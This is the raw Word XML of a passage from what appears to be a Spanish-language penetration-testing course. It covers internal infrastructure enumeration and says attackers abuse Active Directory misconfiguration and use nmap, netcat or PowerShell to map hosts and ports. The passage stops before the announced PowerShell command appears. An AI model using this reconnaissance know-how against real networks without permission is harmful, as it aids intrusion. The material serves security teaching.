    <w:p w14:paraId="2B647BCF" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48EE86C5" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01B513DA" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="193"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AC75555" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="17735"/>
        </w:tabs>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122</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C216E21" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:footerReference w:type="default" r:id="rId210"/>
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="480" w:right="0" w:bottom="0" w:left="0" w:header="0" w:footer="0" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="598AC712"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816704" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5BE313B1" wp14:editId="31775EAB">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="12192000" cy="1304925"/>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04925"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="12192000" cy="1304925"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="457" name="Graphic 457"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="12192000" cy="1304925"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="12192000" h="1304925">
                                <a:moveTo>
                                  <a:pt x="0" y="1304544"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="12192000" y="1304544"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="12192000" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="1304544"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:solidFill>
                            <a:srgbClr val="B34512"/>
                          </a:solidFill>
                        </wps:spPr>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:prstTxWarp prst="textNoShape">
                            <a:avLst/>
                          </a:prstTxWarp>
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="458" name="Textbox 458"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="12192000" cy="1304925"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="52C8BCBE" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                              <w:pPr>
                                <w:spacing w:before="389"/>
                                <w:ind w:left="4136"/>
                                <w:rPr>
                                  <w:rFonts w:ascii="Calibri Light"/>
                                  <w:sz w:val="88"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Calibri Light"/>
                                  <w:color w:val="FFFFFF"/>
                                  <w:sz w:val="88"/>
                                </w:rPr>
                                <w:t>4.2 Enumeraci</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Calibri Light"/>
                                  <w:color w:val="FFFFFF"/>
                                  <w:sz w:val="88"/>
                                </w:rPr>
                                <w:t>ó</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Calibri Light"/>
                                  <w:color w:val="FFFFFF"/>
                                  <w:sz w:val="88"/>
                                </w:rPr>
                                <w:t>n de infraestructura</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group w14:anchorId="5BE313B1" id="Group 456" o:spid="_x0000_s1228" style="position:absolute;margin-left:0;margin-top:0;width:960pt;height:102.75pt;z-index:15816704;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" coordsize="12192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">
                <v:shape id="Graphic 457" o:spid="_x0000_s1229" style="position:absolute;width:121920;height:13049;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="1219200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" path="m,1304544r12192000,l12192000,,,,,1304544xe" fillcolor="#b34512" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Textbox 458" o:spid="_x0000_s1230" type="#_x0000_t202" style="position:absolute;width:121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52C8BCBE" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                        <w:pPr>
                          <w:spacing w:before="389"/>
                          <w:ind w:left="4136"/>
                          <w:rPr>
                            <w:rFonts w:ascii="Calibri Light"/>
                            <w:sz w:val="88"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Calibri Light"/>
                            <w:color w:val="FFFFFF"/>
                            <w:sz w:val="88"/>
                          </w:rPr>
                          <w:t>4.2 Enumeraci</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Calibri Light"/>
                            <w:color w:val="FFFFFF"/>
                            <w:sz w:val="88"/>
                          </w:rPr>
                          <w:t>ó</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Calibri Light"/>
                            <w:color w:val="FFFFFF"/>
                            <w:sz w:val="88"/>
                          </w:rPr>
                          <w:t>n de infraestructura</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <w10:wrap anchorx="page" anchory="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C03EAB6" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D50148A" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="393"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0430FCD4" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="864"/>
        </w:tabs>
        <w:spacing w:line="211" w:lineRule="auto"/>
        <w:ind w:right="1635"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Aquí, intentaremos centrarnos más en el mapeo de los dispositivos de red, hosts presentes en el entorno interno.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66600CE2" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DDB18F7" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="449"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29596D8F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="864"/>
        </w:tabs>
        <w:spacing w:before="1" w:line="211" w:lineRule="auto"/>
        <w:ind w:right="1189"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Los atacantes aprovechan las herramientas integradas para enumerar y mapear hosts activos en el entorno.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66CCD8C5" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BA4E4E4" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="444"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FEDEB2C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="864"/>
        </w:tabs>
        <w:spacing w:line="213" w:lineRule="auto"/>
        <w:ind w:right="3761"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Dado que la red interna se compone principalmente de un entorno de Active Directory, nos centraremos en Abusar de la </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>configuración</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>incorrecta</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4563E9D9" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:spacing w:line="213" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:footerReference w:type="default" r:id="rId211"/>
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="0" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="399" w:gutter="0"/>
          <w:pgNumType w:start="123"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="250F1522"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817728" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4B779924" wp14:editId="463ADDCF">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="12192000" cy="1325880"/>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25880"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="12192000" cy="1325880"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="460" name="Graphic 460"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="12192000" cy="1325880"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="12192000" h="1325880">
                                <a:moveTo>
                                  <a:pt x="12192000" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="1325879"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="12192000" y="1325879"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="12192000" y="0"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:solidFill>
                            <a:srgbClr val="B34512"/>
                          </a:solidFill>
                        </wps:spPr>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:prstTxWarp prst="textNoShape">
                            <a:avLst/>
                          </a:prstTxWarp>
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="461" name="Textbox 461"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="12192000" cy="1325880"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="1508D053" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                              <w:pPr>
                                <w:spacing w:before="422"/>
                                <w:ind w:left="3260"/>
                                <w:rPr>
                                  <w:rFonts w:ascii="Calibri Light"/>
                                  <w:sz w:val="88"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Calibri Light"/>
                                  <w:color w:val="FFFFFF"/>
                                  <w:sz w:val="88"/>
                                </w:rPr>
                                <w:t>4.2.1 Enumeraci</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Calibri Light"/>
                                  <w:color w:val="FFFFFF"/>
                                  <w:sz w:val="88"/>
                                </w:rPr>
                                <w:t>ó</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Calibri Light"/>
                                  <w:color w:val="FFFFFF"/>
                                  <w:sz w:val="88"/>
                                </w:rPr>
                                <w:t>n de red interna</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group w14:anchorId="4B779924" id="Group 459" o:spid="_x0000_s1231" style="position:absolute;margin-left:0;margin-top:0;width:960pt;height:104.4pt;z-index:15817728;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" coordsize="121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">
                <v:shape id="Graphic 460" o:spid="_x0000_s1232" style="position:absolute;width:121920;height:13258;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="1219200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" path="m12192000,l,,,1325879r12192000,l12192000,xe" fillcolor="#b34512" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Textbox 461" o:spid="_x0000_s1233" type="#_x0000_t202" style="position:absolute;width:121920;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1508D053" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                        <w:pPr>
                          <w:spacing w:before="422"/>
                          <w:ind w:left="3260"/>
                          <w:rPr>
                            <w:rFonts w:ascii="Calibri Light"/>
                            <w:sz w:val="88"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Calibri Light"/>
                            <w:color w:val="FFFFFF"/>
                            <w:sz w:val="88"/>
                          </w:rPr>
                          <w:t>4.2.1 Enumeraci</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Calibri Light"/>
                            <w:color w:val="FFFFFF"/>
                            <w:sz w:val="88"/>
                          </w:rPr>
                          <w:t>ó</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Calibri Light"/>
                            <w:color w:val="FFFFFF"/>
                            <w:sz w:val="88"/>
                          </w:rPr>
                          <w:t>n de red interna</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <w10:wrap anchorx="page" anchory="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EAA7106" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BBECB71" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="618FAD34" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="388"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FF4872B" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1117"/>
        </w:tabs>
        <w:spacing w:line="211" w:lineRule="auto"/>
        <w:ind w:left="1117" w:right="1151" w:hanging="361"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Herramientas</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>como</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>utilidades</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> integradas como </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">PowerShell </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>también se pueden usar con fines de enumeración.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F2704F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="323"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69CB71EB" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1115"/>
          <w:tab w:val="left" w:pos="1117"/>
        </w:tabs>
        <w:spacing w:line="213" w:lineRule="auto"/>
        <w:ind w:left="1117" w:right="2154" w:hanging="361"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>A continuación se muestra el comando para examinar los puertos TCP abiertos desde una consulta de PowerShell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDE41CD" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="358F31DC" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51789D56" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
